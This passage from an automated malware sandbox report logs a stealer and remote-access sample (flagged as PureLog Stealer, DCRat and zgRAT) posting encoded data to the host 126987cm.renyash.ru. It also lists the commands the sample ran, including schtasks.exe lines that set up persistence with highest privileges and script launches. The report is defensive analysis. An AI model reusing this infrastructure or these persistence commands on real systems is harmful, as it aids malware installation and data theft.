                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 1f 28 26 24 0c 23 54 21 55 3e 06 37 1c 24 22 32 11 26 20 2d 0a 2a 2b 3c 01 3f 3f 2c 52 31 3c 30 5f 33 29 29 1b 3c 54 30 5d 3e 0c 20 5c 05 1b 3a 06 30 39 30 01 26 2b 3a 0c 3e 09 2f 01 23 3f 08 58 2a 0a 20 57 20 06 36 05 25 01 21 53 33 29 2d 0a 2b 05 30 01 3e 30 01 54 32 07 2a 51 0f 16 3b 0b 3d 09 26 10 29 2c 24 1c 24 0f 37 03 36 36 39 13 25 38 20 0c 33 2a 22 10 3f 00 24 0e 23 20 20 0c 31 3c 2a 12 32 00 24 0d 2c 2a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!(&$#T!U>7$"2& -*+<??,R1<0_3))<T0]> \:090&+:>/#?X* W 6%!S3)-+0>0T2*Q;=&),$$7669%8 3*"?$# 1<*2$,*&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                121192.168.2.450128172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:54.595823050 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:54.952347040 CET1072OUTData Raw: 51 55 5b 5f 56 40 59 5e 5d 56 5b 57 54 5d 51 58 58 56 58 59 5b 54 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[_V@Y^]V[WT]QXXVXY[TWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Y'13X#!-!4'.+#+T(<" R'#-)1A+#1!^&%X*#
                                                                                                                                Jan 1, 2025 21:48:55.048865080 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:55.224039078 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nVwcMlmc2KgAOq574fD6Khyd8p%2F1Bt3K%2B2dNvzEA2vHIQ91OsCQsOmU97DINxrcclSIi9PwGtGZM7JkLU8ARhVuLIuJqqewzVheXMmwgETv1JMQme0so4nK29T3qDkrCpiErvwEA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f77bc4242a5-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3488&min_rtt=1731&rtt_var=4164&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=92446&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                122192.168.2.450129172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:55.343507051 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:55.702524900 CET1072OUTData Raw: 51 53 5b 56 56 47 59 54 5d 56 5b 57 54 59 51 5c 58 5c 58 5e 5b 52 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QS[VVGYT]V[WTYQ\X\X^[RWEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["&2^#> >#^$5V+4Q",0#:)&!E?<[%!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:55.788171053 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:55.965631962 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FXHorMTy9Un%2FIf80vX3wP6DmjAkHIs6agCI17lpEiWTynywz1yiCOraSxKEyMC2FFzMnIECO2bboEYnFSUVBSste%2FQvqzn0Xhmxi1hL6sSSDmRRHwsbyuwDjDh8Sh5%2FPr5wrQxHN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f7c6f26f797-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2364&min_rtt=1570&rtt_var=2176&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=184296&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                123192.168.2.450130172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:56.091758966 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:56.437292099 CET1072OUTData Raw: 54 52 5e 53 53 44 5c 53 5d 56 5b 57 54 5a 51 52 58 54 58 5a 5b 54 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR^SSD\S]V[WTZQRXTXZ[TWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'!#[7-Y!;_$>'"+#+7'5/$&[>)C<'':!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:56.713004112 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:56.978677988 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:56 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MEvlZlcYg89%2FqCRPBpBL91EERz3Bc55oxhIS2nWj7GbPMZBVGEtBVHSdebo1Zrk%2F8Z0HI0XEVFI3KA4owtxRLD5i1SvBpJlNb2JsPduNO66DwK5UjumGV00wjWlqCut0KDDn6j%2Fw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f81db6ac34d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=47158&min_rtt=38834&rtt_var=31211&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=13848&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a
                                                                                                                                Data Ascii: 40VX[
                                                                                                                                Jan 1, 2025 21:48:57.098083973 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                124192.168.2.450131172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:57.254924059 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:57.614315033 CET1072OUTData Raw: 54 57 5b 56 56 4a 59 50 5d 56 5b 57 54 59 51 5e 58 55 58 50 5b 55 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW[VVJYP]V[WTYQ^XUXP[UWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X$!# "" 0-5]4?'<#&(R3!*59<?':!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:57.702872038 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:58.020695925 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:57 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSmk3TIdD6cQ9Wqy8TnZd9yVF9SF%2BHVlZZxpea9z2BeeGfjCgkZ9oYaDgOBERrihpesCCmRJsglaKTu%2FeEh7SaR1ggpnNYy5oPJLmilrpu2WRXNwQLT4KlWqGHEiFZRLcYKp8x1z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f8858828c75-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2346&min_rtt=1818&rtt_var=1738&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=241481&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                125192.168.2.450132172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:58.141271114 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:58.499340057 CET1072OUTData Raw: 54 57 5b 55 56 4b 5c 56 5d 56 5b 57 54 5d 51 52 58 57 58 5e 5b 50 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW[UVK\V]V[WT]QRXWX^[PWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X32X4-!><3,[#('U(U"4R30Z*:<0[2!^&%X*#
                                                                                                                                Jan 1, 2025 21:48:58.610589981 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:58.786775112 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:58 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQB%2BnzZV9lkIc9Op0OtGXLiNwR%2BryoOsKQGJuKp3MQMBkAQrgVk3cX%2BE4hiZFrnYvxWDtGNH538iUKHM1AensxSHNLW2Axb8aZa0ebkkNTDtMP5rbBF0RCCA2wX3LYAwdTeXRyWL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f8e0f4441b2-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4008&min_rtt=2122&rtt_var=4568&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=84814&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                126192.168.2.450133172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:58.950297117 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:59.296674967 CET1072OUTData Raw: 54 52 5b 52 56 4b 5c 54 5d 56 5b 57 54 5a 51 53 58 51 58 59 5b 51 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR[RVK\T]V[WTZQSXQXY[QWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Y$!'X Y"=+$=Y!R+B;P6%+':\)5"(#'*!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:59.394798994 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:59.587954998 CET809INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:59 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1yq%2B5uZkxCqRmJhKdwWOV%2F7jtmCjRlAwhfihCWu%2B3t%2F9ejEbmPpENeDJ2itcvBDzfZhmquj8WIJLzNiqeTQDOdM2%2F0QY8CueLiLnNqUw99E6qY85yFJAwqKnBlel3tDX7YtfKWxS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f92eae142fb-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2922&min_rtt=1596&rtt_var=3252&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=119564&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:15:46:53
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Users\user\Desktop\544WP3NHaP.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\544WP3NHaP.exe"
                                                                                                                                Imagebase:0x8a0000
                                                                                                                                File size:2'235'083 bytes
                                                                                                                                MD5 hash:50ABE040B81818BF7ECE156A10DBBBC9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1651965789.00000000062AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1652451917.0000000006BBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:1
                                                                                                                                Start time:15:46:53
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe"
                                                                                                                                Imagebase:0xe40000
                                                                                                                                File size:147'456 bytes
                                                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:3
                                                                                                                                Start time:15:47:15
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\bridgemssurrogateintonet\7tLztOWB7CeM.bat" "
                                                                                                                                Imagebase:0x240000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:4
                                                                                                                                Start time:15:47:15
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:5
                                                                                                                                Start time:15:47:15
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe"
                                                                                                                                Imagebase:0xa10000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1870378712.0000000000A12000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1924266865.000000001306B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Avira
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:6
                                                                                                                                Start time:15:47:17
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:7
                                                                                                                                Start time:15:47:17
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:8
                                                                                                                                Start time:15:47:17
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 12 /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:9
                                                                                                                                Start time:15:47:17
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline"
                                                                                                                                Imagebase:0x7ff6bd510000
                                                                                                                                File size:2'759'232 bytes
                                                                                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:15:47:17
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:11
                                                                                                                                Start time:15:47:17
                                                                                                                                Start date:01/01/2025
